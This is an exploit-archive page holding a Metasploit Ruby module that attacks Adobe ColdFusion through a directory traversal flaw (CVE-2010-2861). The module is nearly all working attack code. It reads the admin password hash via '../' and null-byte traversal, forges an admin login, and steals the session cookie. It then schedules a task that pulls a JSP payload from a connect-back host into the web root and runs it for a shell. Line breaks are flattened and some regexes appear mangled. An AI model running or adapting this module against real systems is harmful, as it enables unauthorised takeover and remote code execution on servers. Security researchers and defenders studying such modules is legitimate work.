[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Adobe ColdFusion - Directory Traversal
# Published : 2011-03-16
# Author : metasploit
# Previous Title : Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow
# Next Title : HP OpenView Performance Insight Server Backdoor Account Code Execution


				 				
			
### $Id: coldfusion_traversal.rb 11974 2011-03-16 01:38:16Z mc $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote	Rank = NormalRanking	include Msf::Exploit::Remote::HttpServer::HTML	include Msf::Exploit::Remote::HttpClient	def initialize(info = {})		super(update_info(info,			'Name'           => 'Adobe ColdFusion - Directory Traversal',			'Description'    => %q{					This module exploits a directory traversal bug in Adobe ColdFusion.				By reading the password.properties a user can login using the encrypted 				password itself. This should work on version 8 and below.			},			'License'        => MSF_LICENSE,			'Author'         => [ 'webDEViL' ],			'Version'        => '$Revision: 11974 $',			'References'     =>				[					[ 'CVE', '2010-2861' ],					[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],						[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],						],			'Privileged'   	=> true,			'Platform'      => ['linux','windows'],			'Stance'       	=> Msf::Exploit::Stance::Aggressive,			'Targets'       =>				[					[ 'Universal',						{							'Arch' => ARCH_JAVA,							'Payload' => 'java'						}					],				],			'DisclosureDate' => 'Aug 25 2010',			'DefaultTarget'  => 0))		register_options(			[				OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),				OptString.new('URL',   [ true, 'Administrator Directory', '/CFIDE/administrator/' ]),				OptString.new('CBIP',  [ true, 'Connect Back IP (even when not using reverse shell)', nil ]),				OptString.new('TRAV',  [ false, 'Location of the password.properties file eg. ../../../../ColdFusion8/lib/password.properties%00en', nil ]),  			], self.class)	end		def exploit			ip = datastore['RHOST']		url = datastore['URL']+"enter.cfm"		locale = "?locale="		trav = datastore['TRAV'] || "../../../../../../../../../../../../../../../../../../../../../../lib/password.properties%00en"		datastore['JSP'] = "wD-"+rand_text_alphanumeric(6)+".jsp"		datastore['URIPATH'] = rand_text_alphanumeric(6)				print_status("Trying to acheive Directory Traversal...")		while trav.match(/..///im)			res = send_request_raw({				'uri'     => url+locale+trav,				'method'  => 'GET',				'headers' =>					{						'Connection' => "keep-alive",						'Accept-Encoding' => "zip,deflate",					},				}, -1)				if (res.nil?)				print_error("no response for #{ip}:#{rport} #{url}")			elsif (res.code == 200)				#print_error("#{res.body}")#debug								if match = res.body.match(/([0-9A-F]{40})/im);					caphash = $1					print_status("URL: #{ip}#{url}?locale=#{trav}")					print_status("Admin Hash: " + caphash)					break				else					#select(nil, nil, nil, 3)					trav=trav[3..-1]					print_status("Trav:"+trav)									end							else				''			end		end				if caphash.nil?			print_error("Could not determine location of password.properties file, Set TRAV option manually")			print_error("OR ColdFusion is not vulnerable")			return		end				keyz = Time.now.to_i.to_s+"123"		print_status("Time: "+ keyz)		loghash= OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('sha1'), keyz, caphash).unpack('H*')[0].upcase		print_status("Login Hash: "+loghash)				params =  'cfadminPassword='+loghash		params << '&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F&'		params << 'salt='+keyz		params << '&submit=Login'		res = send_request_cgi({			'method'    => 'POST',			'uri'       => url,			'data'  => params		})		if (res)			#print_status("Me want Cookie: "+ res.headers['Set-Cookie'])			if (res.headers['Set-Cookie'].match(/([A-Za-z0-9]{20,200})/im);)				session = $1				print_status("Cookie: #{session}")			else				print_error("Error retrieving cookie!")			end		else			print_error("No response received while logging in.")		end		print_status("Attempting to automatically detect the platform...")		##AUTO_DETECT START		path = datastore['URL'] + 'settings/mappings.cfm'		res = send_request_raw(			{				'uri'    => path,				'headers' =>					{						'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}"					}			}, 20)		if (not res) or (res.code != 200)			print_error("Failed: Error requesting #{path}")			return nil		end		if (res.body.match(/.*td *>(.*CFIDE&nbsp;)/im);)			os = $1			os.match(/<td [^>]*?>(.*)&nbsp/im);			os1 =$1			os1 = os1.gsub("/t", '')			os1 = os1.gsub("/r/n", '')			if (os1 =~ /:/i) #haha ;)				print_status('OS: Windows')				datastore['SHELL'] = 'cmd.exe'				os1=os1+"//"        			else #(os1 =~ ////i)				print_status('OS: Linux')				datastore['SHELL'] = '/bin/sh'				os1=os1+"/"			end			print_status("Web Directory:"+os1)		end		##AUTO_DETECT END		res = send_request_raw(			{				'uri'     => "/CFIDE/administrator/scheduler/scheduleedit.cfm?submit=Schedule+New+Task",				'method'  => 'GET',				'headers' =>					{						'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}",					}			}, 25)		if (res.body.match(/<input name="StartTimeOnce".*?value="(.*?)">/im);)			start_time = $1		end		if (res.body.match(/<input name="Start_Date".*?value="(.*?)" id="Start_Date">/im);)        			start_date = $1		end		#else FAIL!		comb = start_date + start_time		fmt = "%b %d, %Y%I:%M %p"		comb = ((DateTime.strptime(comb,fmt)).advance :minutes =>-19)		t = comb.strftime("%b %d, %Y")		t1 = comb.strftime("%I:%M %p")		#t=(Time.now).strftime("%b %d, %Y") #can't use local time		#t1=(Time.now + 5).strftime("%I:%M:%S %p")		params =  'TaskName=wD-'+rand_text_alphanumeric(6)		params << "&Start_Date=#{t}" #Mar+12%2C+2011		params << '&End_Date=&ScheduleType=Once'		params << "&StartTimeOnce=#{t1}" #6%3A40+PM		params << ' &Interval=Daily&StartTimeDWM=&customInterval_hour=0&customInterval_min=0&customInterval_sec=0&CustomStartTime=&CustomEndTime=&Operation=HTTPRequest'		params << '&ScheduledURL=http%3A%2F%2F'+datastore['CBIP']+":"+datastore['SRVPORT']+"/"+datastore['URIPATH']		params << '&Username=&Password=&Request_Time_out=&proxy_server=&http_proxy_port=&publish=1'		params << '&publish_file='+os1+datastore['JSP']		params << '&adminsubmit=Submit&taskNameOrig='				res = send_request_raw(			{				'uri'     => "/CFIDE/administrator/scheduler/scheduleedit.cfm",				'method'  => 'POST',				'data'    => params,				'headers' =>					{						'Content-Type'   => 'application/x-www-form-urlencoded',						'Content-Length' => params.length,						'Cookie'     => "CFAUTHORIZATION_cfadmin=#{session}",					}			}, 25)		#print_error("#{res.body}")		super	end				def on_request_uri(cli, request)		p = regenerate_payload(cli)		#print_status("SHELL set to #{datastore['SHELL']}")		#print_status((p.encoded).to_s)				print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")		# Transmit the response to the client		send_response(cli, p.encoded, { 'Content-Type' => 'text/html' })		res = send_request_raw(			{				'uri'     => "/CFIDE/"+datastore['JSP'],				'method'  => 'GET',			}, 25)		# Handle the payload		handler(cli)	endend